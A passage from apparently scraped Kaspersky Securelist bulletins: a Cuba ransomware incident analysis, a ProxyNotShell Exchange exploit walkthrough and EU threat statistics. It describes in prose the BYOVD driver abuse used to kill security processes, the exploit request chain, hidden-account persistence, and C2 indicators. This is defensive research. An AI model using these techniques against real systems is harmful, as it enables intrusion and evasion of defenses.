In particular, the C2 may send a command to download further malware, such as Cobalt Strike Beacon, Metasploit, or further Bughatch modules.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141930/Cuba_ransomware_17.png>)\n\nBughatch operating diagram\n\n### SRV_Service host\n\n#### Veeamp\n\nAfter some time, we found a malicious process started on a neighboring host; we dubbed this "SRV_Service":\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142027/Cuba_ransomware_18.png>)\n\nMalicious process starting\n\n**Veeamp.exe** is a custom-built data dumper written in C#, which leverages security flaws in the Veeam backup and recovery service to connect to the VeeamBackup SQL database and grab account credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142101/Cuba_ransomware_19.png>)\n\nAnalysis of Veeamp\n\n**Veeamp** exploits the following Veeam vulnerabilities: CVE-2022-26500, CVE-2022-26501, CVE-2022-26504. The first two allow an unauthenticated user to remotely execute arbitrary code, and the third one lets domain users do the same. After any of the three are exploited, the malware outputs the following in the control panel:\n\n * User name\n * Encrypted password\n * Decrypted password\n * User description in the Credentials table of Veeam: group membership, permissions and so on\n\nThe malware is not exclusive to the Cuba gang. 
We spotted it also in attacks by other groups, such as Conti and [Yanluowang](<https://securelist.com/how-to-recover-files-encrypted-by-yanluowang/106332/>).\n\nActivity we saw on SRV_Service after Veeamp finished its job was similar to what we had observed on SRV_STORAGE with Bughatch:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142319/Cuba_ransomware_20.png>)\n\nBughatch activity on SRV_Service\n\nAs was the case with SRV_STORAGE, the malware dropped three files into the temp folder, and then executed these in the same order, connecting to the same addresses.\n\n#### Avast Anti-Rootkit driver\n\nAfter Bughatch successfully established a connection to its C2, we watched as the group used an increasingly popular technique: Bring Your Own Vulnerable Driver (BYOVD).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153116/Cuba_ransomware_21.png>)\n\nExploiting a vulnerable driver\n\nThe malicious actors install the vulnerable driver in the system and subsequently use it to various ends, such as terminating processes or evading defenses through privilege escalation to kernel level.\n\nHackers are drawn to vulnerable drivers because they all run in kernel mode, with a high level of system access. Besides, a legitimate driver with a digital signature will not raise any red flags with security systems, helping the attackers to stay undetected for longer.\n\nDuring the attack, the malware created three files in the temp folder:\n\n * **aswarpot.sys**: a legitimate anti-rootkit driver by Avast that has two vulnerabilities: [CVE-2022-26522](<https://vulners.com/cve/CVE-2022-26522>) and [CVE-2022-26523](<https://vulners.com/cve/CVE-2022-26523>), which allow a user with limited permissions to run code at kernel level.\n * **KK.exe**: malware known as Burntcigar. 
The file we found was a new variety that used the flawed driver to terminate processes.\n * **av.bat** batch script: a stager that installs the Avast driver as a kernel service and executes Burntcigar.\n\nAnalysis of the BAT file and telemetry data suggests that av.bat uses the sc.exe utility to create a service named "aswSP_ArPot2", specifying the path to the driver in the C:\\windows\\temp\\ directory and the service type as kernel service. The BAT file then starts the service with the help of the same sc.exe utility and runs KK.exe, which connects to the vulnerable driver.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153226/Cuba_ransomware_22.png>)\n\nContents of the .bat file that we found\n\n#### Burntcigar\n\nThe first thing we noticed while looking into Burntcigar was the path to the PDB file, which contained a folder curiously named "Musor" (the Russian for "trash"), more indication that the members of the Cuba gang may speak Russian.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153308/Cuba_ransomware_23.png>)\n\nPath to the KK.exe PDB file\n\nWe further discovered that the sample at hand was a new version of Burntcigar, undetectable by security systems at the time of the incident. 
The hackers had apparently updated the malware because, in the wake of previous attacks, many vendors were able to easily detect the logic run by older versions.\n\nYou may have noticed that in the screenshot of our sample below, all data about processes to be terminated is encrypted, whereas older versions openly displayed the names of all processes that the attackers wanted stopped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153352/Cuba_ransomware_24.png>)\n\nComparison between the old and new version of Burntcigar\n\nThe malware searches for process names that suggest a relation to popular AV or EDR products and adds their process IDs to the stack to terminate later.\n\nBurntcigar uses the DeviceIoControl function to access the vulnerable Avast driver, specifying the location of the code that contains the security issue as an execution option. The piece of code contains the ZwTerminateProcess function, which the attackers use for terminating processes.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153438/Cuba_ransomware_25.png>)\n\nAnalysis of Burntcigar\n\nFortunately, our product's self-defense was able to cope with the malware by blocking all hooks to the driver.\n\nLater, we discovered similar activity exploiting the Avast anti-rootkit driver on the Exchange server and the SRV_STORAGE host. In both cases, the attackers used a BAT file to install the insecure driver and then start Burntcigar.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153516/Cuba_ransomware_26.png>)\n\nBurntcigar activity on the neighboring hosts\n\n### SRV_MAIL host (Exchange server)\n\nOn December 20, the customer granted our request to add the Exchange server to the scope of monitoring. The host must have been used as an entry point to the customer network, as the server was missing critical updates, and it was susceptible to most of the group's initial access vectors. 
In particular, SRV_MAIL had the ProxyLogon, ProxyShell and Zerologon vulnerabilities still unremediated. This is why we believe that the attackers penetrated the customer network through the Exchange server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153603/Cuba_ransomware_27.png>)\n\nTelemetry data starts coming in\n\nOn SRV_MAIL, the SqlDbAdmin user showed the same kind of activity as that which we had observed on the previous hosts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153645/Cuba_ransomware_28.png>)\n\nMalicious activity by SqlDbAdmin\n\nWe found that the attackers were using the legitimate gotoassistui.exe tool for transferring malicious files between the infected hosts.\n\nGoToAssist is an RDP support utility often used by technical support teams, but the application is often abused to bypass any security defenses or response teams when moving files between systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153724/Cuba_ransomware_29.png>)\n\nSending malicious files via gotoassistui.exe\n\nWe also found that new Bughatch samples were being executed. These used slightly different file names, callback functions and C2 servers, as our systems were successfully blocking older versions of the malware at that time.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153814/Cuba_ransomware_30.png>)\n\nBughatch activity\n\n#### SqlDbAdmin\n\nWe wondered who that SqlDbAdmin was. The answer came through a suspicious DLL, addp.dll, which we found manually on a compromised host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153857/Cuba_ransomware_31.png>)\n\nSuspicious dynamic library\n\nWe found that it used the WIN API function NetUserAdd to create the user. 
The name and password were hard-coded inside the DLL.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153937/Cuba_ransomware_32.png>)\n\nAnalysis of addp.dll\n\nAs we looked further into the library, we found that it used the **RegCreateKey** function to enable RDP sessions for the newly created user by modifying a registry setting. The library then added the user to the Special Account registry tree to hide it from the system login screen, an interesting and fairly unconventional persistence technique. In most cases, bad actors add new users with the help of scripts that security products rarely miss.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154040/Cuba_ransomware_33.png>)\n\nAnalysis of addp.dll\n\n#### Cobalt Strike\n\nWe found a suspicious DLL, ion.dll, running on the Exchange server as part of the rundll32 process with unusual execution options. At first, we figured that the activity was similar to what we had earlier seen with Bughatch. However, further analysis showed that the library was, in fact, a Cobalt Strike Beacon.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154119/Cuba_ransomware_34.png>)\n\nExecution of the suspicious ion.dll file\n\nWhen we were looking at the ion.dll code, what caught our attention were the execution settings and a function that uses the Cobalt Strike configuration. The library used the VirtualAlloc function to allocate process memory in which to execute the Cobalt Strike Beacon payload later.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154153/Cuba_ransomware_35.png>)\n\nAnalysis of ion.dll\n\nAll configuration data was encrypted, but we did find the function used for decrypting it. 
To find the Cobalt Strike C2 server, we inspected a rundll32 memory dump with ion.dll loaded into it, running with the same settings it did on the victim host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154225/Cuba_ransomware_36.png>)\n\nMemory dump of rundll32\n\nFinding out the name of the C2 helped us to locate the history of communications with that server within the telemetry data. After the malware connected to the C2, it downloaded two suspicious files into the Windows folder on the infected server and then executed these. Unfortunately, we were not able to obtain the two files for analysis, as the hackers had failed to disable security at the previous step, and the files were wiped off the infected host. We do believe, though, that what we were dealing with was the ransomware itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154301/Cuba_ransomware_37.png>)\n\nCommunications with the attackers' C2 server\n\nThe customer promptly isolated the affected hosts and forwarded the incident to the Kaspersky Incident Response team for further investigation and search for possible artifacts. This was the last we saw of the malicious actor's activity in the customer system. The hosts avoided encryption thanks to the customer following our recommendations and directions, and responding to the incident in time.\n\n## New malware\n\nWe found that VirusTotal contained new samples of the Cuba malware with the same file metadata as the ones in the incident described above. Some of those samples had successfully evaded detection by all cybersecurity vendors. We ran our analysis on each of the samples. As you can see from the screenshot below, these are new versions of Burntcigar using encrypted data for anti-malware evasion. 
We have made Yara rules that detect these new samples, and we are providing these in the attachment to this article.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154344/Cuba_ransomware_38.png>)\n\nNew malware samples\n\n## BYOVD (Bring Your Own Vulnerable Driver)\n\nWe will now take a closer look at an attack that uses insecure drivers, which we observed as we investigated the incident and which is currently growing in popularity as various APT and ransomware gangs add it to their arsenals.\n\nBring Your Own Vulnerable Driver (BYOVD) is a type of attack where the bad actor uses legitimate signed drivers that are known to contain a security hole to execute malicious actions inside the system. If successful, the attacker will be able to exploit the vulnerabilities in the driver code to run any malicious actions at kernel level!\n\nUnderstanding why this is one of the most dangerous kinds of attacks takes a quick refresher on what drivers are. A driver is a type of software that acts as an intermediary between the operating system and the device. The driver converts OS instructions into commands that the device can interpret and execute. A further use of drivers is supporting applications or features that the operating system originally lacks. As you can see from the image below, the driver is a layer of sorts between user mode and kernel mode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154422/Cuba_ransomware_39.png>)\n\nUser mode and kernel mode interaction diagram. Source: \n<https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode>\n\nApplications running in user mode have fewer privileges to control the system. All they can get access to is a virtualized memory area that is isolated and protected from the rest of the system. The driver runs inside the kernel memory, and it can execute any operations just like the kernel itself. 
The driver can get access to critical security structures and modify those. Modifications like that leave the system open to attacks involving privilege escalation, disabling of OS security services, and arbitrary reading and writing.\n\nThe [Lazarus](<https://www.bleepingcomputer.com/news/security/lazarus-hackers-abuse-dell-driver-bug-using-new-fudmodule-rootkit/>) gang made use of that technique in 2021 as they gained write access to kernel memory and disabled Windows security features by abusing a Dell driver that contained the [CVE-2021-21551](<https://vulners.com/cve/CVE-2021-21551>) vulnerability.\n\nThere is no sure-fire defense against legitimate drivers, because any driver could prove to have a security flaw. Microsoft has published a list of recommendations to protect against this type of technique:\n\n * Enable Hypervisor-Protected Code Integrity.\n * Enable Memory Integrity.\n * Enable validation of driver digital signatures.\n * Use the [vulnerable driver blocklist](<https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules>).\n\nHowever, [studies](<https://habr.com/ru/companies/kaspersky/articles/693840/>) suggest that these recommendations are not enough on their own: even with every Windows protection feature enabled, attacks like these still go through.\n\nTo counter this technique, many security vendors have started adding a self-defense module to their products that prevents malware from terminating processes and blocks every attempt at exploiting vulnerable drivers. Our [products](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-select>) have that feature too, and it proved effective during the incident.\n\n## Conclusion\n\nThe Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools, which it keeps up to date, and various techniques and methods, including fairly dangerous ones such as BYOVD. 
Combating attacks at this level of complexity calls for sophisticated technology capable of detecting advanced threats and protecting security features from being disabled, and a massive, continuously updated threat knowledge base that helps to detect malicious artifacts manually.\n\nThe incident detailed in this article shows that investigation of real-life cyberattacks and incident response, such as Managed Detection and Response (MDR), are sources of the latest information about malicious tactics, techniques and procedures. In particular, during this investigation, we discovered new and previously undetected samples of the Cuba malware, and artifacts suggesting that at least some of the gang members spoke Russian.\n\nThat said, effective investigation and response begin with knowledge of current cyberthreats, which is available from Threat Intelligence services. At Kaspersky, the Threat Intelligence and MDR teams work closely while exchanging data and enhancing their services all the time.\n\n## Appendix\n\nSigma and YARA rules: <https://github.com/BlureL/SigmaYara-Rules> \nIndicators of Compromise: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/14105934/Cuba-ransomware-IoCs-02.pdf>) \nMitre ATT&CK matrices: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/11095522/Cuba-ransomware-TTPs.pdf>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-11T10:00:26", "type": "securelist", "title": "From Caribbean shores to your devices: analyzing Cuba ransomware", "bulletinFamily": "blog", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-21551", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-26500", "CVE-2022-26501", "CVE-2022-26504", "CVE-2022-26522", "CVE-2022-26523"], "modified": "2023-09-11T10:00:26", "id": "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "href": "https://securelist.com/cuba-ransomware/110533/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-19T16:54:06", "description": "\n\n## Summary\n\nAt the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability \u2013 CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. 
As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server and perform lateral movement.\n\nAfter CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided [mitigation guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.\n\nOn October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and the command line to be executed on the victim's host.\n\nThe cybersecurity community dubbed the pair of vulnerabilities **ProxyNotShell**. The name refers to the earlier ProxyShell attack chain, a set of similar vulnerabilities in Exchange Server that were disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.\n\n## ProxyNotShell exploitation details\n\nThe first step in this attack is exploiting **CVE-2022-41040** to get access to the PowerShell API endpoint. Exploiting insufficient filtering of input data in the Exchange **Autodiscover** mechanism, an attacker with a known login and password combination for a registered account can gain access to the privileged endpoint of the Exchange Server API (**https://%exchange server domain%/powershell**). 
This access allows the attacker to execute PowerShell commands in Exchange's environment on the server machine, passing them in the payload via the XML SOAP protocol.\n\nAt the next step, the attacker must get access to **Web-Based Enterprise Management (WBEM)** via the **WSMAN Protocol**. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via **Windows Remote Management (PsRemoting)**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01.png>)\n\n**_HTTP POST request with XML SOAP to initiate PsRemoting_**\n\nAfter initiation of the shell, the attacker should immediately extend its lifetime; otherwise, the shell will be closed as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that the attacker immediately sends a special request via **WSMAN** that enables the **keep alive** option.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02.png>)\n\n**_HTTP POST request with XML SOAP to extend the shell's lifetime_**\n\nAfter that, the attacker exploits a second vulnerability \u2013 **CVE-2022-41082**. By using PowerShell Remoting the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called **System.UnitySerializationHolder** that spawns an object of the **System.Windows.Markup.XamlReader** class. This class processes XAML data from a payload, which creates a new object of the **System.Diagnostics** class and contains a method call to open a new process on the target system. 
In the published PoC, this process is **calc.exe**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03.png>)\n\n**_HTTP POST request with XML SOAP to start a new process_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png>)\n\n**_Main payload portion that executes the calc.exe process_**\n\n## ProxyNotShell post-exploitation\n\nA few weeks after the vulnerability was disclosed, Kaspersky detected a successful exploitation of **ProxyNotShell** in the wild. The actor performed the following actions:\n\n * Reconnaissance (users, groups, domains)\n * Various hijack attempts (even dropping vulnerable binaries)\n * Remote process injection\n * Persistence\n * Reverse shell\n\nIn this case, the attacker had the credentials to perform such an intrusion. They exploited the company's Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05.png>)\n\nOn the server side, all processes that are started via exploitation share the same parent process with specific parameters: **w3wp.exe -ap "msexchangepowershellapppool"**.\n\nThese post-exploitation steps of the attack are very similar to the steps in the attack reported by 
[TrendMicro](<https://www.trendmicro.com/pl_pl/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.html>), with the only difference being the vulnerabilities that are exploited.\n\nOur products protect against all of these post-exploitation steps as well as other attacks leveraging the **CVE-2022-41040** and **CVE-2022-41082** vulnerabilities. The detection name for **ProxyNotShell** is **PDM:Exploit.Win32.Generic**.\n\n## Our recommendations\n\nA few words of advice to those worried about possible exploitation of ProxyNotShell or other 0-day vulnerabilities:\n\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections.\n * Use the latest [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) data to stay aware of the current TTPs used by threat actors.\n * Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. 
Our [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component monitors suspicious actions by applications and blocks the execution of malicious files.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) that identify and stop attacks in the early stages.\n\n## Indicators of compromise\n\n**MD5** | **File name** | **Description** | **Verdict** \n---|---|---|--- \nF77E55FD56FDAD21766CAA9C896734E9 | LockDown.dll | Malware hijack library | Trojan.Win64.Dllhijacker \nF9322EAD69300501356B13D751165DAA | mfeann.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \nA2FAE32F116870E5A94B5FAB50A1CB71 | Svchosts.exe | Malware reverse proxy | Trojan.Win64.Agent.qwibok, HEUR:HackTool.Win64.Proxy.gen \n47A0814408210E6FCA502B3799B3952B | Glib-2.0.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n379F87DAA6A23400ADF19C1CDD6B0DC9 | vmwarexferlogs.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \n\n**Network indicator** | **Description** \n---|--- \n193.149.185.52:443 | C2 server \nsync.service.auzreservices.com | C2 server", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T16:15:49", "type": "securelist", "title": "CVE-2022-41040 and CVE-2022-41082 \u2013 zero-days in MS Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-19T16:15:49", "id": "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "href": "https://securelist.com/cve-2022-41040-and-cve-2022-41082-zero-days-in-ms-exchange/108364/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-26T10:37:33", "description": "\n\n_All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who have given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in this endeavor to collect information about malicious activity. 
The statistics in this report cover the period from May 2020 to April 2021, inclusive._\n\n## Main figures\n\n * **70%** of Internet user computers in the EU experienced at least one **Malware-class** attack.\n * In the EU, Kaspersky solutions blocked **115,452,157** web attacks.\n * **2,676,988** unique URLs were recognized as malicious by our Web Anti-Virus.\n * **377,685** unique malicious objects were blocked by our Web Anti-Virus.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of **79,315** users.\n * **56,877** unique users in the EU were attacked by ransomware.\n * **132,656** unique users in the EU were attacked by miners.\n * **40%** of users of Kaspersky solutions in the EU encountered at least one phishing attack.\n * **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU.\n\n## Financial threats\n\n_The statistics include not only banking threats, but also malware for ATMs and payment terminals._\n\n### Number of users attacked by banking malware\n\nDuring the reporting period, Kaspersky solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of **79,315** users.\n\n_Number of EU users attacked by financial malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124132/01-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware, for each EU country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all attacked users in that country.\n\n_Geography of banking malware attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124226/02-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by 
share of attacked users**\n\n| **Country** | **%*** \n---|---|--- \n1 | Cyprus | 1.3 \n2 | Bulgaria | 1.2 \n3 | Greece | 1.1 \n4 | Italy | 1.0 \n5 | Portugal | 1.0 \n6 | Croatia | 0.8 \n7 | Germany | 0.6 \n8 | Latvia | 0.6 \n9 | Poland | 0.6 \n10 | Romania | 0.6 \n \n_* The share of unique users in the EU whose computers were targeted by financial malware in the total number of unique EU users attacked by all kinds of malware._\n\n**Top 10 financial malware families**\n\n| **Name** | **%*** \n---|---|--- \n1 | Zbot | 24.7 \n2 | Nymaim | 11.5 \n3 | Danabot | 9.9 \n4 | Emotet | 8.9 \n5 | CliptoShuffler | 7.7 \n6 | BitStealer | 5.6 \n7 | SpyEyes | 3.5 \n8 | Gozi | 3.4 \n9 | Dridex | 3.2 \n10 | Trickster | 1.9 \n \n_* The share of unique users in the EU attacked by this malware in the total number of users attacked by financial malware._\n\n## Ransomware programs\n\nDuring the reporting period, we identified more than **17,317** ransomware modifications and detected **25** new families. Note that we did not create a separate family for each new piece of ransomware. 
Most threats of this type were assigned the generic verdict, which we give to new and unknown samples.\n\n_Number of new ransomware modifications detected in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124303/03-en-european-ksb-2021.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nDuring the reporting period, ransomware Trojans attacked **56,877** unique users, including **12,358** corporate users (excluding SMBs) and **2,274** users associated with small and medium-sized businesses.\n\n_Number of users in the EU attacked by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124332/04-en-european-ksb-2021.png>))_\n\n### Threat geography\n\n_Geography of attacks in the EU by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124520/05-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 0.56 \n2 | Cyprus | 0.38 \n3 | Portugal | 0.36 \n4 | Bulgaria | 0.31 \n5 | Hungary | 0.29 \n6 | Italy | 0.29 \n7 | Latvia | 0.28 \n8 | Slovenia | 0.27 \n9 | Spain | 0.26 \n10 | Estonia | 0.23 \n \n_* The share of unique users in the EU country whose computers were targeted by ransomware in the total number of unique users in that country attacked by all kinds of malware._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Gen | 14.40 \n2 | (generic verdict) | Trojan-Ransom.Win32.Agent | 12.58 \n3 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 10.80 \n4 | (generic verdict) | Trojan-Ransom.Win32.Generic | 5.94 \n5 | Stop | Trojan-Ransom.Win32.Stop | 3.87 \n6 | WannaCry | Trojan-Ransom.Win32.Wanna | 3.20 \n7 | (generic verdict) | 
Trojan-Ransom.Win32.Crypmod | 2.31 \n8 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.30 \n9 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.97 \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.85 \n \n_* The share of unique Kaspersky users attacked by the given family of ransomware Trojans in the total number of users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of users attacked by miners in the EU\n\nDuring the reporting period, we detected attempts to install a miner on the computers of **132,656** unique users. Miners accounted for 0.53% of all attacks and 10.31% of all Risktool-type programs.\n\n_Number of EU users attacked by miners, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124550/06-en-european-ksb-2021.png>))_\n\nDuring the reporting period, Kaspersky products detected Trojan.Win32.Miner.gen (generic verdict) more often than any other miner; it accounted for 13.62% of all users attacked by miners. It was followed by Trojan.Win32.Miner.bbb (8.67%) and Trojan.JS.Miner.m (2.84%).\n\n### Threat geography\n\n_Geography of miner-related attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124619/07-en-european-ksb-2021.png>))_\n\n## Vulnerable applications used by cybercriminals\n\nIn 2020, most vulnerabilities were discovered by researchers before attackers could exploit them. However, zero-day vulnerabilities were not absent either; among those Kaspersky found were:\n\n * CVE-2020-1380, a use-after-free vulnerability in the Jscript9 component of Microsoft's Internet Explorer browser caused by insufficient checks during the generation of optimized JIT code. 
